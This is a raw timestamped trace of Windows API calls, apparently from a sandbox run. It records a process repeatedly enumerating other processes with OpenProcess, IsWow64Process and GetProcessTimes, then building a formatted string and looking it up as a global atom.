	[0117.650] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0117.650] CloseHandle (hObject=0x698) returned 1
	[0117.650] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0117.650] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0117.650] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.650] CloseHandle (hObject=0x698) returned 1
	[0117.650] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0117.650] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.650] CloseHandle (hObject=0x698) returned 1
	[0117.650] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0117.651] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.651] CloseHandle (hObject=0x698) returned 1
	[0117.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0117.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0117.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0117.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0117.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0117.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0117.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0117.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0117.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0117.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0117.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0117.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0117.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0117.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0117.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0117.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0117.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0117.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0117.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0117.718] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.718] CloseHandle (hObject=0x698) returned 1
	[0117.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0117.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0117.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0117.719] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.719] CloseHandle (hObject=0x698) returned 1
	[0117.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0117.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0117.719] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.719] CloseHandle (hObject=0x698) returned 1
	[0117.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0117.719] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.719] CloseHandle (hObject=0x698) returned 1
	[0117.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0117.720] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.720] CloseHandle (hObject=0x698) returned 1
	[0117.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0117.720] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.720] CloseHandle (hObject=0x698) returned 1
	[0117.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0117.720] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.720] CloseHandle (hObject=0x698) returned 1
	[0117.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0117.720] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.720] CloseHandle (hObject=0x698) returned 1
	[0117.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0117.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0117.721] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.721] CloseHandle (hObject=0x698) returned 1
	[0117.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0117.721] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.721] CloseHandle (hObject=0x698) returned 1
	[0117.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0117.721] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.721] CloseHandle (hObject=0x698) returned 1
	[0117.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0117.721] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.721] CloseHandle (hObject=0x698) returned 1
	[0117.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0117.722] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.722] CloseHandle (hObject=0x698) returned 1
	[0117.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0117.722] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.722] CloseHandle (hObject=0x698) returned 1
	[0117.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0117.722] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.722] CloseHandle (hObject=0x698) returned 1
	[0117.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0117.722] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.723] CloseHandle (hObject=0x698) returned 1
	[0117.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0117.723] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.723] CloseHandle (hObject=0x698) returned 1
	[0117.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0117.723] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.723] CloseHandle (hObject=0x698) returned 1
	[0117.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0117.723] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.723] CloseHandle (hObject=0x698) returned 1
	[0117.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0117.723] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.723] CloseHandle (hObject=0x698) returned 1
	[0117.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0117.724] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.724] CloseHandle (hObject=0x698) returned 1
	[0117.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0117.724] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.724] CloseHandle (hObject=0x698) returned 1
	[0117.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0117.724] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.724] CloseHandle (hObject=0x698) returned 1
	[0117.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0117.724] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.724] CloseHandle (hObject=0x698) returned 1
	[0117.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0117.725] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.725] CloseHandle (hObject=0x698) returned 1
	[0117.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0117.725] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.725] CloseHandle (hObject=0x698) returned 1
	[0117.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0117.725] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.725] CloseHandle (hObject=0x698) returned 1
	[0117.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0117.725] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.725] CloseHandle (hObject=0x698) returned 1
	[0117.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0117.726] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.726] CloseHandle (hObject=0x698) returned 1
	[0117.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0117.726] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.726] CloseHandle (hObject=0x698) returned 1
	[0117.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0117.726] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.726] CloseHandle (hObject=0x698) returned 1
	[0117.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0117.726] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.727] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0117.727] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0117.727] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0117.727] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.727] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0117.729] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.729] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0117.729] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0117.729] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0117.729] CloseHandle (hObject=0x698) returned 1
	[0117.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0117.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0117.730] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.730] CloseHandle (hObject=0x698) returned 1
	[0117.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0117.730] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.730] CloseHandle (hObject=0x698) returned 1
	[0117.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0117.730] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.730] CloseHandle (hObject=0x698) returned 1
	[0117.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0117.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0117.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0117.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0117.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0117.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0117.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0117.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0117.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0117.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0117.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0117.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0117.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0117.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0117.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0117.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0117.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0117.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0117.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0117.833] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.833] CloseHandle (hObject=0x698) returned 1
	[0117.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0117.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0117.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0117.834] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.834] CloseHandle (hObject=0x698) returned 1
	[0117.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0117.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0117.834] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.834] CloseHandle (hObject=0x698) returned 1
	[0117.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0117.835] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.835] CloseHandle (hObject=0x698) returned 1
	[0117.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0117.835] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.835] CloseHandle (hObject=0x698) returned 1
	[0117.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0117.835] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.835] CloseHandle (hObject=0x698) returned 1
	[0117.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0117.835] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.835] CloseHandle (hObject=0x698) returned 1
	[0117.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0117.835] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.835] CloseHandle (hObject=0x698) returned 1
	[0117.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0117.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0117.836] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.836] CloseHandle (hObject=0x698) returned 1
	[0117.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0117.836] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.836] CloseHandle (hObject=0x698) returned 1
	[0117.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0117.836] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.836] CloseHandle (hObject=0x698) returned 1
	[0117.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0117.836] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.836] CloseHandle (hObject=0x698) returned 1
	[0117.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0117.837] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.837] CloseHandle (hObject=0x698) returned 1
	[0117.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0117.837] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.837] CloseHandle (hObject=0x698) returned 1
	[0117.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0117.837] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.837] CloseHandle (hObject=0x698) returned 1
	[0117.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0117.837] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.837] CloseHandle (hObject=0x698) returned 1
	[0117.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0117.838] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.838] CloseHandle (hObject=0x698) returned 1
	[0117.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0117.838] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.838] CloseHandle (hObject=0x698) returned 1
	[0117.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0117.838] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.838] CloseHandle (hObject=0x698) returned 1
	[0117.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0117.838] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.838] CloseHandle (hObject=0x698) returned 1
	[0117.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0117.839] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.839] CloseHandle (hObject=0x698) returned 1
	[0117.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0117.839] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.839] CloseHandle (hObject=0x698) returned 1
	[0117.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0117.839] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.839] CloseHandle (hObject=0x698) returned 1
	[0117.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0117.845] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.845] CloseHandle (hObject=0x698) returned 1
	[0117.846] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0117.846] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.846] CloseHandle (hObject=0x698) returned 1
	[0117.846] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0117.846] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.846] CloseHandle (hObject=0x698) returned 1
	[0117.846] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0117.846] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.846] CloseHandle (hObject=0x698) returned 1
	[0117.846] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0117.846] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.846] CloseHandle (hObject=0x698) returned 1
	[0117.846] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0117.846] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.847] CloseHandle (hObject=0x698) returned 1
	[0117.847] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0117.847] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.847] CloseHandle (hObject=0x698) returned 1
	[0117.847] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0117.847] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.847] CloseHandle (hObject=0x698) returned 1
	[0117.847] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0117.848] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.848] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0117.848] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0117.848] wsprintfA (in: param_1=0x3993c40, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0117.848] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.848] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0117.849] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0117.849] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0117.849] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0117.849] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0117.849] CloseHandle (hObject=0x698) returned 1
	[0117.849] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0117.849] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0117.849] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.849] CloseHandle (hObject=0x698) returned 1
	[0117.849] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0117.849] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.849] CloseHandle (hObject=0x698) returned 1
	[0117.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0117.850] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0117.850] CloseHandle (hObject=0x698) returned 1
	[0117.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0117.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0117.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0117.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0117.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0117.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0117.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0117.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0117.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
